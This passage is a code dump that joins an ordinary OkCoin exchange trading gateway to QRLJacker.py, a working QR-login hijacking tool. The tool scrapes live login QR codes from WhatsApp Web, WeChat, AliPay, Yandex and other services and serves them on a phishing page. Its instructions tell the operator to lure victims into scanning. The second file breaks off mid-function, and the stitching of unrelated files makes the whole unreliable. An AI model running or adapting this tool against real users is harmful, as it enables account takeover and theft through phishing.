channelSymbolMap['ok_sub_spotcny_ltc_depth_20'] = LTC_CNY_SPOT
########################################################################
class OkcoinGateway(VtGateway):
"""OkCoin接口"""
#----------------------------------------------------------------------
def __init__(self, eventEngine, gatewayName='OKCOIN'):
"""Constructor"""
super(OkcoinGateway, self).__init__(eventEngine, gatewayName)
self.api = Api(self)
self.leverage = 0
self.connected = False
#----------------------------------------------------------------------
def connect(self):
"""连接"""
# 载入json文件
fileName = self.gatewayName + '_connect.json'
path = os.path.abspath(os.path.dirname(__file__))
fileName = os.path.join(path, fileName)
try:
            f = open(fileName)
except IOError:
log = VtLogData()
log.gatewayName = self.gatewayName
            log.logContent = 'Failed to read the connection configuration, please check'
self.onLog(log)
return
        # Parse the JSON file
setting = json.load(f)
try:
host = str(setting['host'])
apiKey = str(setting['apiKey'])
secretKey = str(setting['secretKey'])
trace = setting['trace']
leverage = setting['leverage']
except KeyError:
log = VtLogData()
log.gatewayName = self.gatewayName
            log.logContent = 'Connection configuration is missing required fields, please check'
self.onLog(log)
return
        # Initialize the API
self.leverage = leverage
if host == 'CNY':
host = vnokcoin.OKCOIN_CNY
else:
host = vnokcoin.OKCOIN_USD
self.api.active = True
self.api.connect(host, apiKey, secretKey, trace)
log = VtLogData()
log.gatewayName = self.gatewayName
        log.logContent = 'API initialized successfully'
self.onLog(log)
        # Start periodic queries
self.initQuery()
self.startQuery()
#----------------------------------------------------------------------
def subscribe(self, subscribeReq):
"""订阅行情"""
pass
#----------------------------------------------------------------------
def sendOrder(self, orderReq):
"""发单"""
return self.api.spotSendOrder(orderReq)
#----------------------------------------------------------------------
def cancelOrder(self, cancelOrderReq):
"""撤单"""
self.api.spotCancel(cancelOrderReq)
#----------------------------------------------------------------------
def qryAccount(self):
"""查询账户资金"""
self.api.spotUserInfo()
#----------------------------------------------------------------------
def qryPosition(self):
"""查询持仓"""
pass
#----------------------------------------------------------------------
def close(self):
"""关闭"""
self.api.active = False
self.api.close()
#----------------------------------------------------------------------
def initQuery(self):
"""初始化连续查询"""
if self.qryEnabled:
# 需要循环的查询函数列表
self.qryFunctionList = [self.qryAccount]
self.qryCount = 0 # 查询触发倒计时
self.qryTrigger = 2 # 查询触发点
self.qryNextFunction = 0 # 上次运行的查询函数索引
self.startQuery()
#----------------------------------------------------------------------
def query(self, event):
"""注册到事件处理引擎上的查询函数"""
self.qryCount += 1
if self.qryCount > self.qryTrigger:
            # Reset the countdown
self.qryCount = 0
            # Execute the query function
function = self.qryFunctionList[self.qryNextFunction]
function()
            # Compute the index of the next query function; if it exceeds the list length, reset it to 0
self.qryNextFunction += 1
if self.qryNextFunction == len(self.qryFunctionList):
self.qryNextFunction = 0
#----------------------------------------------------------------------
def startQuery(self):
"""启动连续查询"""
self.eventEngine.register(EVENT_TIMER, self.query)
#----------------------------------------------------------------------
def setQryEnabled(self, qryEnabled):
"""设置是否要启动循环查询"""
self.qryEnabled = qryEnabled
########################################################################
class Api(vnokcoin.OkCoinApi):
"""OkCoin的API实现"""
#----------------------------------------------------------------------
def __init__(self, gateway):
"""Constructor"""
super(Api, self).__init__()
        self.gateway = gateway                  # gateway object
        self.gatewayName = gateway.gatewayName  # gateway object name
        self.active = False                     # if True, reconnect automatically after a disconnect
self.cbDict = {}
self.tickDict = {}
self.orderDict = {}
        self.localNo = 0                # local order number
        self.localNoQueue = Queue()     # queue of local order numbers that have not yet received a system order ID
        self.localNoDict = {}           # key: local order number, value: system order ID
        self.orderIdDict = {}           # key: system order ID, value: local order number
        self.cancelDict = {}            # key: local order number, value: cancel request
self.initCallback()
#----------------------------------------------------------------------
def onMessage(self, ws, evt):
"""信息推送"""
data = self.readData(evt)[0]
channel = data['channel']
callback = self.cbDict[channel]
callback(data)
#----------------------------------------------------------------------
def onError(self, ws, evt):
"""错误推送"""
error = VtErrorData()
error.gatewayName = self.gatewayName
error.errorMsg = str(evt)
self.gateway.onError(error)
#----------------------------------------------------------------------
def onClose(self, ws):
"""接口断开"""
# 如果尚未连上,则忽略该次断开提示
if not self.gateway.connected:
return
self.gateway.connected = False
        self.writeLog('Server connection lost')
        # Reconnect
if self.active:
def reconnect():
while not self.gateway.connected:
                    self.writeLog('Waiting 10 seconds before reconnecting')
sleep(10)
if not self.gateway.connected:
self.reconnect()
t = Thread(target=reconnect)
t.start()
#----------------------------------------------------------------------
def onOpen(self, ws):
"""连接成功"""
self.gateway.connected = True
        self.writeLog('Server connected successfully')
        # After connecting, query account and order data
self.spotUserInfo()
self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_LTC, '-1')
self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_BTC, '-1')
        # After connecting, subscribe to spot trade and account data
self.subscribeSpotTrades()
self.subscribeSpotUserInfo()
self.subscribeSpotTicker(vnokcoin.SYMBOL_BTC)
self.subscribeSpotTicker(vnokcoin.SYMBOL_LTC)
self.subscribeSpotDepth(vnokcoin.SYMBOL_BTC, vnokcoin.DEPTH_20)
self.subscribeSpotDepth(vnokcoin.SYMBOL_LTC, vnokcoin.DEPTH_20)
        # If connected to the USD site, subscribe to futures-related data as well
if self.currency == vnokcoin.CURRENCY_USD:
self.subscribeFutureTrades()
self.subscribeFutureUserInfo()
self.subscribeFuturePositions()
        # Push contract information
if self.currency == vnokcoin.CURRENCY_CNY:
l = self.generateCnyContract()
else:
l = self.generateUsdContract()
for contract in l:
contract.gatewayName = self.gatewayName
self.gateway.onContract(contract)
#----------------------------------------------------------------------
def writeLog(self, content):
"""快速记录日志"""
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = content
self.gateway.onLog(log)
#----------------------------------------------------------------------
def initCallback(self):
"""初始化回调函数"""
# USD_SPOT
self.cbDict['ok_sub_spotusd_btc_ticker'] = self.onTicker
self.cbDict['ok_sub_spotusd_ltc_ticker'] = self.onTicker
self.cbDict['ok_sub_spotusd_btc_depth_20'] = self.onDepth
self.cbDict['ok_sub_spotusd_ltc_depth_20'] = self.onDepth
self.cbDict['ok_spotusd_userinfo'] = self.onSpotUserInfo
self.cbDict['ok_spotusd_orderinfo'] = self.onSpotOrderInfo
self.cbDict['ok_sub_spotusd_userinfo'] = self.onSpotSubUserInfo
self.cbDict['ok_sub_spotusd_trades'] = self.onSpotSubTrades
self.cbDict['ok_spotusd_trade'] = self.onSpotTrade
self.cbDict['ok_spotusd_cancel_order'] = self.onSpotCancelOrder
# CNY_SPOT
self.cbDict['ok_sub_spotcny_btc_ticker'] = self.onTicker
self.cbDict['ok_sub_spotcny_ltc_ticker'] = self.onTicker
self.cbDict['ok_sub_spotcny_btc_depth_20'] = self.onDepth
self.cbDict['ok_sub_spotcny_ltc_depth_20'] = self.onDepth
self.cbDict['ok_spotcny_userinfo'] = self.onSpotUserInfo
self.cbDict['ok_spotcny_orderinfo'] = self.onSpotOrderInfo
self.cbDict['ok_sub_spotcny_userinfo'] = self.onSpotSubUserInfo
self.cbDict['ok_sub_spotcny_trades'] = self.onSpotSubTrades
self.cbDict['ok_spotcny_trade'] = self.onSpotTrade
self.cbDict['ok_spotcny_cancel_order'] = self.onSpotCancelOrder
# USD_FUTURES
#----------------------------------------------------------------------
def onTicker(self, data):
""""""
if 'data' not in data:
return
channel = data['channel']
symbol = channelSymbolMap[channel]
if symbol not in self.tickDict:
tick = VtTickData()
tick.symbol = symbol
tick.vtSymbol = symbol
tick.gatewayName = self.gatewayName
self.tickDict[symbol] = tick
else:
tick = self.tickDict[symbol]
rawData = data['data']
tick.highPrice = float(rawData['high'])
tick.lowPrice = float(rawData['low'])
tick.lastPrice = float(rawData['last'])
tick.volume = float(rawData['vol'].replace(',', ''))
#tick.date, tick.time = generateDateTime(rawData['timestamp'])
newtick = copy(tick)
self.gateway.onTick(newtick)
#----------------------------------------------------------------------
def onDepth(self, data):
""""""
if 'data' not in data:
return
channel = data['channel']
symbol = channelSymbolMap[channel]
if symbol not in self.tickDict:
tick = VtTickData()
tick.symbol = symbol
tick.vtSymbol = symbol
tick.gatewayName = self.gatewayName
self.tickDict[symbol] = tick
else:
tick = self.tickDict[symbol]
if 'data' not in data:
return
rawData = data['data']
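        # Note: bids are read from the front of the list while asks are read from the end
        # ([-1] .. [-5]); the feed appears to deliver asks sorted from worst to best price,
        # so the negative indices below pick out the five best asks.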
tick.bidPrice1, tick.bidVolume1 = rawData['bids'][0]
tick.bidPrice2, tick.bidVolume2 = rawData['bids'][1]
tick.bidPrice3, tick.bidVolume3 = rawData['bids'][2]
tick.bidPrice4, tick.bidVolume4 = rawData['bids'][3]
tick.bidPrice5, tick.bidVolume5 = rawData['bids'][4]
tick.askPrice1, tick.askVolume1 = rawData['asks'][-1]
tick.askPrice2, tick.askVolume2 = rawData['asks'][-2]
tick.askPrice3, tick.askVolume3 = rawData['asks'][-3]
tick.askPrice4, tick.askVolume4 = rawData['asks'][-4]
tick.askPrice5, tick.askVolume5 = rawData['asks'][-5]
tick.date, tick.time = generateDateTime(rawData['timestamp'])
newtick = copy(tick)
self.gateway.onTick(newtick)
#----------------------------------------------------------------------
def onSpotUserInfo(self, data):
"""现货账户资金推送"""
rawData = data['data']
info = rawData['info']
funds = rawData['info']['funds']
        # Position information
for symbol in ['btc', 'ltc', self.currency]:
if symbol in funds['free']:
pos = VtPositionData()
pos.gatewayName = self.gatewayName
pos.symbol = symbol
pos.vtSymbol = symbol
pos.vtPositionName = symbol
pos.direction = DIRECTION_NET
pos.frozen = float(funds['freezed'][symbol])
pos.position = pos.frozen + float(funds['free'][symbol])
self.gateway.onPosition(pos)
        # Account balance
account = VtAccountData()
account.gatewayName = self.gatewayName
account.accountID = self.gatewayName
account.vtAccountID = account.accountID
account.balance = float(funds['asset']['net'])
self.gateway.onAccount(account)
#----------------------------------------------------------------------
def onSpotSubUserInfo(self, data):
"""现货账户资金推送"""
if 'data' not in data:
return
rawData = data['data']
info = rawData['info']
        # Position information
for symbol in ['btc', 'ltc', self.currency]:
if symbol in info['free']:
pos = VtPositionData()
pos.gatewayName = self.gatewayName
pos.symbol = symbol
pos.vtSymbol = symbol
pos.vtPositionName = symbol
pos.direction = DIRECTION_NET
pos.frozen = float(info['freezed'][symbol])
pos.position = pos.frozen + float(info['free'][symbol])
self.gateway.onPosition(pos)
#----------------------------------------------------------------------
def onSpotSubTrades(self, data):
"""成交和委托推送"""
if 'data' not in data:
return
rawData = data['data']
        # Local and exchange order numbers
orderId = str(rawData['orderId'])
localNo = self.orderIdDict[orderId]
        # Order information
if orderId not in self.orderDict:
order = VtOrderData()
order.gatewayName = self.gatewayName
order.symbol = spotSymbolMap[rawData['symbol']]
order.vtSymbol = order.symbol
order.orderID = localNo
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
order.price = float(rawData['tradeUnitPrice'])
order.totalVolume = float(rawData['tradeAmount'])
order.direction, priceType = priceTypeMap[rawData['tradeType']]
self.orderDict[orderId] = order
else:
order = self.orderDict[orderId]
order.tradedVolume = float(rawData['completedTradeAmount'])
order.status = statusMap[rawData['status']]
self.gateway.onOrder(copy(order))
        # Trade information
if 'sigTradeAmount' in rawData and float(rawData['sigTradeAmount'])>0:
trade = VtTradeData()
trade.gatewayName = self.gatewayName
trade.symbol = spotSymbolMap[rawData['symbol']]
trade.vtSymbol = order.symbol
trade.tradeID = str(rawData['id'])
trade.vtTradeID = '.'.join([self.gatewayName, trade.tradeID])
trade.orderID = localNo
trade.vtOrderID = '.'.join([self.gatewayName, trade.orderID])
trade.price = float(rawData['sigTradePrice'])
trade.volume = float(rawData['sigTradeAmount'])
trade.direction, priceType = priceTypeMap[rawData['tradeType']]
trade.tradeTime = datetime.now().strftime('%H:%M:%S')
self.gateway.onTrade(trade)
#----------------------------------------------------------------------
def onSpotOrderInfo(self, data):
"""委托信息查询回调"""
rawData = data['data']
for d in rawData['orders']:
self.localNo += 1
localNo = str(self.localNo)
orderId = str(d['order_id'])
self.localNoDict[localNo] = orderId
self.orderIdDict[orderId] = localNo
if orderId not in self.orderDict:
order = VtOrderData()
order.gatewayName = self.gatewayName
order.symbol = spotSymbolMap[d['symbol']]
order.vtSymbol = order.symbol
order.orderID = localNo
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
order.price = d['price']
order.totalVolume = d['amount']
order.direction, priceType = priceTypeMap[d['type']]
self.orderDict[orderId] = order
else:
order = self.orderDict[orderId]
order.tradedVolume = d['deal_amount']
order.status = statusMap[d['status']]
self.gateway.onOrder(copy(order))
#----------------------------------------------------------------------
def generateSpecificContract(self, contract, symbol):
"""生成合约"""
new = copy(contract)
new.symbol = symbol
new.vtSymbol = symbol
new.name = symbol
return new
#----------------------------------------------------------------------
def generateCnyContract(self):
"""生成CNY合约信息"""
contractList = []
contract = VtContractData()
contract.exchange = EXCHANGE_OKCOIN
contract.productClass = PRODUCT_SPOT
contract.size = 1
contract.priceTick = 0.01
contractList.append(self.generateSpecificContract(contract, BTC_CNY_SPOT))
contractList.append(self.generateSpecificContract(contract, LTC_CNY_SPOT))
return contractList
#----------------------------------------------------------------------
def generateUsdContract(self):
"""生成USD合约信息"""
contractList = []
        # Spot
contract = VtContractData()
contract.exchange = EXCHANGE_OKCOIN
contract.productClass = PRODUCT_SPOT
contract.size = 1
contract.priceTick = 0.01
contractList.append(self.generateSpecificContract(contract, BTC_USD_SPOT))
contractList.append(self.generateSpecificContract(contract, LTC_USD_SPOT))
        # Futures
contract.productClass = PRODUCT_FUTURES
contractList.append(self.generateSpecificContract(contract, BTC_USD_THISWEEK))
contractList.append(self.generateSpecificContract(contract, BTC_USD_NEXTWEEK))
contractList.append(self.generateSpecificContract(contract, BTC_USD_QUARTER))
contractList.append(self.generateSpecificContract(contract, LTC_USD_THISWEEK))
contractList.append(self.generateSpecificContract(contract, LTC_USD_NEXTWEEK))
contractList.append(self.generateSpecificContract(contract, LTC_USD_QUARTER))
return contractList
#----------------------------------------------------------------------
def onSpotTrade(self, data):
"""委托回报"""
rawData = data['data']
orderId = rawData['order_id']
        # Although the websocket interface returns exchange order IDs asynchronously,
        # testing shows they come back in first-sent-first-returned order, so take the
        # earliest local order number from the queue and map it to the pushed exchange ID
localNo = self.localNoQueue.get_nowait()
self.localNoDict[localNo] = orderId
self.orderIdDict[orderId] = localNo
        # If a cancel request was issued before the exchange order ID came back,
        # execute that cancellation now
if localNo in self.cancelDict:
req = self.cancelDict[localNo]
self.spotCancel(req)
del self.cancelDict[localNo]
#----------------------------------------------------------------------
def onSpotCancelOrder(self, data):
"""撤单回报"""
pass
#----------------------------------------------------------------------
def spotSendOrder(self, req):
"""发单"""
symbol = spotSymbolMapReverse[req.symbol][:4]
type_ = priceTypeMapReverse[(req.direction, req.priceType)]
self.spotTrade(symbol, type_, str(req.price), str(req.volume))
        # Increment the local order number, queue it as a string, and return a vtOrderID based on it
self.localNo += 1
self.localNoQueue.put(str(self.localNo))
vtOrderID = '.'.join([self.gatewayName, str(self.localNo)])
return vtOrderID
#----------------------------------------------------------------------
def spotCancel(self, req):
"""撤单"""
symbol = spotSymbolMapReverse[req.symbol][:4]
localNo = req.orderID
if localNo in self.localNoDict:
orderID = self.localNoDict[localNo]
self.spotCancelOrder(symbol, orderID)
else:
            # If the client requested cancellation before the exchange order ID was
            # returned, store the request in cancelDict and cancel once the ID arrives
self.cancelDict[localNo] = req
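        # Summary of the order-ID round trip as implemented in this class: spotSendOrder()
        # assigns a local number and queues it, onSpotTrade() pops that number and pairs it
        # with the exchange order_id, and spotCancel() uses the mapping when available or
        # parks the request in cancelDict until onSpotTrade() completes the pairing.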
#----------------------------------------------------------------------
def generateDateTime(s):
"""生成时间"""
dt = datetime.fromtimestamp(float(s)/1e3)
time = dt.strftime("%H:%M:%S.%f")
date = dt.strftime("%Y%m%d")
return date, time
|
QRLJacker.py
|
#!/usr/bin/env python
#-*- encoding:utf-8 -*-
#Author: @D4Vinci
import base64 ,time ,os ,urllib ,sys ,threading
from binascii import a2b_base64
def clear():
if os.name == "nt":
os.system("cls")
else:
os.system("clear")
try:
from PIL import Image
import selenium, requests, configparser
from selenium import webdriver
except:
print "[*] Error Importing Exterinal Libraries"
print "[*] Trying install it using the requirements.txt file..\n"
try:
os.system("pip install -r requirements.txt")
except:
try:
#if python not in the path (In windows case)
os.system(str(sys.executable)+" -m pip install -r requirements.txt")
except:
print "[*] Failed installing the requirements [ Install it yourself :p ]"
exit()
finally:
from PIL import Image
import selenium
from selenium import webdriver
settings = configparser.ConfigParser()
def Serve_it(port=1337):
def serve(port):
if os.name=="nt":
try:
print " [*] Starting victim session on http://localhost:"+str(port)
os.system("python -m SimpleHTTPServer "+str(port)+" > NUL 2>&1")
except:
print " [*] Starting victim session on http://localhost:"+str(port)
#if python not in the path (In windows case)
os.system(str(sys.executable)+" -m SimpleHTTPServer "+str(port)+" > NUL 2>&1")
else:
print " [*] Starting victim session on http://localhost:"+str(port)
os.system("python -m SimpleHTTPServer "+str(port)+" > /dev/null 2>&1")
threading.Thread(target=serve,args=(port,)).start()
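# Serve_it() serves the current working directory (where index.html and the captured
# tmp.png/tmp.svg are written) with SimpleHTTPServer on the chosen port, in a background
# thread so the interactive menu keeps running while victims browse the phishing page.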
def create_driver():
try:
web = webdriver.Firefox()
print " [*] Opening Mozila FireFox..."
return web
except:
try:
web = webdriver.Chrome()
print " [*] We got some errors running Firefox, Opening Google Chrome instead..."
return web
except:
try:
web = webdriver.Opera()
print " [*] We got some errors running Chrome, Opening Opera instead..."
return web
except:
try:
web = webdriver.Edge()
print " [*] We got some errors running Opera, Opening Edge instead..."
return web
except:
try:
web = webdriver.Ie()
print " [*] We got some errors running Edge, Opening Internet Explorer instead..."
return web
except:
print " Error: \n Can not call any WebBrowsers\n Check your Installed Browsers!"
exit()
#Stolen from stackoverflow :D
def Screenshot(PicName ,location ,size):
img = Image.open(PicName)#screenshot.png
left = location['x']
top = location['y']
right = left + size['width']
bottom = top + size['height']
box = (int(left), int(top), int(right), int(bottom))
final = img.crop(box) # defines crop points
final.load()
final.save(PicName)
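# Quick usage sketch (this is how AliPay() and Third_Method() below use it): take a
# full-page screenshot first, then crop it down to the located element's bounding box:
#   driver.save_screenshot('tmp.png')
#   element = driver.find_elements_by_tag_name('canvas')[0]
#   Screenshot('tmp.png', element.location, element.size)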
def whatsapp():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get('https://web.whatsapp.com/')
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
button = driver.find_element_by_class_name('qr-button')
print " [*] Idle detected, Reloading QR code image (Good job WhatsApp)..."
button._execute(webdriver.remote.command.Command.CLICK_ELEMENT)
time.sleep(5)
except:
pass
try:
img = driver.find_elements_by_tag_name('img')[0]
src = img.get_attribute('src').replace("data:image/png;base64,","")
print " [*] QR code image detected !"
print " [*] Downloading the image..."
binary_data = a2b_base64(src)
qr = open("tmp.png","wb")
qr.write(binary_data)
print " [*] Saved To tmp.png"
qr.close()
time.sleep(5)
continue
except:
break
#make("svg")
def Yandex():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get("https://passport.yandex.com/auth?mode=qr")
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
img_url = "https://passport.yandex.com" + driver.find_element_by_class_name("qr-code__i").get_attribute("style").split("\"")[1].encode("utf-8")
print " [*] QR code image detected !"
data = urllib.urlopen(img_url).read()
print " [*] Downloading the image.."
f = open("tmp.svg","w").write(data)
print " [*] Saved To tmp.svg"
time.sleep(20)
if "yandex.com" in driver.current_url.encode("utf-8"):
if "mode=qr" not in driver.current_url.encode("utf-8"):
print " [*] Refreshing page..."
try:
driver.get("https://passport.yandex.com/auth?mode=qr")
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
continue
except:
break
def Airdroid():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get("http://web.airdroid.com")
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
img_number = 16
refresh = 0
while True:
try:
button = driver.find_element_by_class_name("widget-login-refresh-qrcode")[0]
print " [*] Clicking to reload QR code image..."
button._execute(selenium.webdriver.remote.command.Command.CLICK_ELEMENT)
time.sleep(5)
except:
pass
try:
imgs = driver.find_elements_by_tag_name('img')
img = imgs[img_number]
print " [*] QR code image detected !"
src = img.get_attribute('src')
print " [*] Downloading the image.."
qr = urllib.urlretrieve(src, "tmp.png")
print " [*] Saved To tmp.png"
time.sleep(10)
if refresh == 0:
print " [*] Refreshing page..."
driver.refresh()
refresh = 1
img_number = 15
continue
except:
break
def Weibo():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get("http://weibo.com/login.php")
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
imgs = driver.find_elements_by_tag_name('img')
img = imgs[len(imgs)-1]
print " [*] QR code image detected !"
src = img.get_attribute('src')
print " [*] Downloading the image.."
qr = urllib.urlretrieve(src, "tmp.png")
print " [*] Saved To tmp.png"
time.sleep(60)
print " [*] Refreshing page..."
driver.refresh()
continue
except:
break
def WeChat():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get("https://web.wechat.com")
time.sleep(5)
except:
print " [*] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
            iclass = driver.find_elements_by_class_name('qrcode')[0]
img = iclass.find_elements_by_tag_name("img")[0]
print " [*] QR code image detected !"
src = img.get_attribute('src')
print " [*] Downloading the image.."
qr = urllib.urlretrieve(src, "tmp.png")
print " [*] Saved To tmp.png"
time.sleep(10)
continue
except:
break
def AliPay():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get("https://auth.alipay.com/login/index.htm")
time.sleep(5)
except:
print " [*] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
c = driver.find_elements_by_class_name('ui-nav')[0]
button = c.find_elements_by_tag_name("li")[0]
print " [*] Clicking to show QR code image..."
button._execute(webdriver.remote.command.Command.CLICK_ELEMENT)
time.sleep(5)
except:
pass
try:
driver.save_screenshot('tmp.png') #screenshot entire page
img = driver.find_elements_by_tag_name("canvas")[0]
print " [*] QR code image detected !"
location = img.location
size = img.size
print " [*] Grabbing photo.."
Screenshot("tmp.png" ,location ,size)
print " [*] Saved To tmp.png"
time.sleep(60)
print " [*] Refreshing page..."
driver.refresh()
continue
except:
break
def Taobao():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get("https://login.taobao.com")
time.sleep(5)
except:
print " [*] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
button_class = driver.find_element_by_class_name("msg-err")
button = button_class.find_elements_by_tag_name("a")[0]
print " [*] Clicking to reload QR code image..."
button._execute(webdriver.remote.command.Command.CLICK_ELEMENT)
time.sleep(5)
except:
pass
try:
imgs = driver.find_elements_by_tag_name('img')
img = imgs[0]
print " [*] QR code image detected !"
src = img.get_attribute('src')
print " [*] Downloading the image.."
qr = urllib.urlretrieve(src, "tmp.png")
print " [*] Saved To tmp.png"
time.sleep(10)
continue
except:
break
def mydigipass():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get("https://www.mydigipass.com/en/fp/signin/smartphone/qr")
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
imgs = driver.find_elements_by_tag_name('img')
img = imgs[1]
print " [*] QR code image detected !"
src = img.get_attribute('src')
print " [*] Downloading the image.."
qr = urllib.urlretrieve(src, "tmp.png")
print " [*] Saved To tmp.png"
time.sleep(20)
print " [*] Refreshing page..."
driver.refresh()
continue
except:
break
def Zapper():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get("https://www.zapper.com/login.php")
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
img = driver.find_elements_by_tag_name("img")[3]
print " [*] QR code image detected !"
src = img.get_attribute('src')
print " [*] Downloading the image.."
qr = urllib.urlretrieve(src, "tmp.png")
print " [*] Saved To tmp.png"
time.sleep(20)
except:
break
def Trustly_App():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get("https://trustlyapp.com/backend")
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
c = driver.find_elements_by_class_name("qrcode-tab")[0]
img = c.find_elements_by_tag_name("img")[0]
print " [*] QR code image detected !"
src = img.get_attribute('src')
print " [*] Downloading the image.."
qr = urllib.urlretrieve(src, "tmp.png")
print " [*] Saved To tmp.png"
time.sleep(60)
continue
except:
break
def Yelophone():
driver = create_driver()
time.sleep(5)
print " [*] Starting attacker session..."
try:
driver.get("https://www.yelophone.com/app#/login")
time.sleep(5)
except:
print " [!] Error Check your internet connection"
time.sleep(5)
return
while True:
try:
c = driver.find_elements_by_id("qrcode")[0]
print " [*] QR code image detected !"
src = c.get_attribute("src")
print " [*] Downloading the image.."
qr = open("tmp.png","wb").write( requests.get( c.get_attribute("src") ).content )
print " [*] Saved To tmp.png"
time.sleep(60)
continue
except:
break
def make( service_name , port , type="html" ):
if type == "html":
code = """<html>
<head>
<title>"""+str(service_name)+"""</title>
</head>
<body>
<script>
var myTimer; myTimer = window.setInterval(reloadD,3000);
function reloadD(){ d = new Date(); document.getElementById('qrcodew').src="tmp.png?h="+d.getTime();}
</script>
<center><h1><b>QRLJacker: """+str(service_name)+"""</b></h1>
    Now you have a local webserver hosting your QRLJacking payload. Here are some instructions:
</br>1. This is your always updated """+str(service_name)+""" QR Code
</b><img id="qrcodew" alt="Scan me!" src="tmp.png" style="display: block;">
</br>2. Edit Index.html by adding your phishing page source code, style, resources, etc.. ("Index.html" located in the framework folder)
    </br>3. Point your victim to your phishing <a href='http://localhost:"""+str(port)+"""'>URL</a>, convince them to scan the QR code, and Bob's your uncle!
</center>
</body>
</html>"""
if type == "svg":
code = """<html>
<head>
<title>"""+str(service_name)+"""</title>
</head>
<body>
<script>
var myTimer; myTimer = window.setInterval(reloadD,3000);
function reloadD(){ d = new Date(); document.getElementById('qrcodew').src="tmp.svg?h="+d.getTime();}
</script>
<center><h1><b>QRLJacker: """+str(service_name)+"""</b></h1>
    Now you have a local webserver hosting your QRLJacking payload. Here are some instructions:
</br>1. This is your always updated """+str(service_name)+""" QR Code
</b><img id="qrcodew" alt="Scan me!" src="tmp.svg" style="display: block;">
</br>2. Edit Index.html by adding your phishing page source code, style, resources, etc.. ("Index.html" located in the framework folder)
    </br>3. Point your victim to your phishing <a href='http://localhost:"""+str(port)+"""'>URL</a>, convince them to scan the QR code, and Bob's your uncle!
</center>
</body>
</html>"""
f = open("index.html","w")
f.write(code)
f.close()
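# make() only writes the auto-refreshing index.html wrapper; its embedded JavaScript reloads
# tmp.png (or tmp.svg) every 3 seconds so the served page always shows the latest QR code
# grabbed by the attacker session. Typical call sequence, as used throughout main():
#   make("Whatsapp", 1337)
#   Serve_it(1337)
#   whatsapp()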
def Add_website():
print " 1.Find image by class and its number method"
print " 2.Find image by its number only method"
print " 3.Find image by the screenshot method"
print " 00.Back To Main Menu"
method = raw_input("\n Note: Customization doesn\'t support svg images for now\n Select method > ")
if method == "00":
main()
elif int(method) == 1:
classname = raw_input(" Classname > ")
url = raw_input(" Url > ")
image_number = int( raw_input(" Image Number > ") )
Seconds = raw_input(" Refresh every (Default 10s) > ")
try:
int(Seconds)
except:
Seconds = 10
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int(port)
except ValueError:
port = 1337
print " [*] Saving settings..."
settings.read(os.path.join('Data', 'Custom.ini'))
name = url.replace("http://","").replace("https://","").split("/")[0]
settings.add_section(name)
settings.set(name,"method","1")
settings.set(name,"classname",classname)
settings.set(name,"url",url)
settings.set(name,"image_number",str(image_number))
settings.set(name,"Seconds",str(Seconds))
settings.write(open(os.path.join('Data', 'Custom.ini'),"wb"))
clear()
print " [*] Settings saved."
print " [*] Running the exploit..."
print "="*12
make( name , port )
Serve_it(port)
First_Method(classname,url,image_number,Seconds)
main()
elif int(method) == 2:
url = raw_input(" Url > ")
image_number = int( raw_input(" Image Number > ") )
Seconds = raw_input(" Refresh every (Default 10s) > ")
try:
int(Seconds)
except:
Seconds = 10
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int( port )
except ValueError:
port = 1337
print " [*] Saving settings..."
settings.read(os.path.join('Data', 'Custom.ini'))
name = url.replace("http://","").replace("https://","").split("/")[0]
settings.add_section(name)
settings.set(name,"method","2")
settings.set(name,"url",url)
settings.set(name,"image_number",str(image_number))
settings.set(name,"Seconds",str(Seconds))
settings.write(open(os.path.join('Data', 'Custom.ini'),"wb"))
clear()
print " [*] Settings saved."
print " [*] Running the exploit..."
print "="*12
make( name , port )
Serve_it( port )
Second_Method( url , image_number , Seconds )
main()
elif int(method) == 3:
url = raw_input(" Url > ")
image_number = int( raw_input(" Image Number (To get its width and location)> ") )
Seconds = raw_input(" Refresh every (Default 10s) > ")
try:
int(Seconds)
except:
Seconds = 10
port = raw_input(" Port to listen on (Default 1337) : ")
try:
int( port )
except ValueError:
port = 1337
print " [*] Saving settings..."
settings.read(os.path.join('Data', 'Custom.ini'))
name = url.replace("http://","").replace("https://","").split("/")[0]
settings.add_section(name)
settings.set(name,"method","3")
settings.set(name,"url",url)
settings.set(name,"image_number",str(image_number))
settings.set(name,"Seconds",str(Seconds))
settings.write(open(os.path.join('Data', 'Custom.ini'),"wb"))
clear()
print " [*] Settings saved."
print " [*] Running the exploit..."
print "="*12
make( name , port )
Serve_it( port )
Third_Method( url , image_number , Seconds )
main()
else:
main()
def Use_website():
settings.read(os.path.join('Data', 'Custom.ini'))
print "\n"
for n,w in enumerate(settings.sections()):
print " "+str(n)+"."+w.encode("utf-8")
print " 00.Back To Main Menu"
website = raw_input("\n Select website > ")
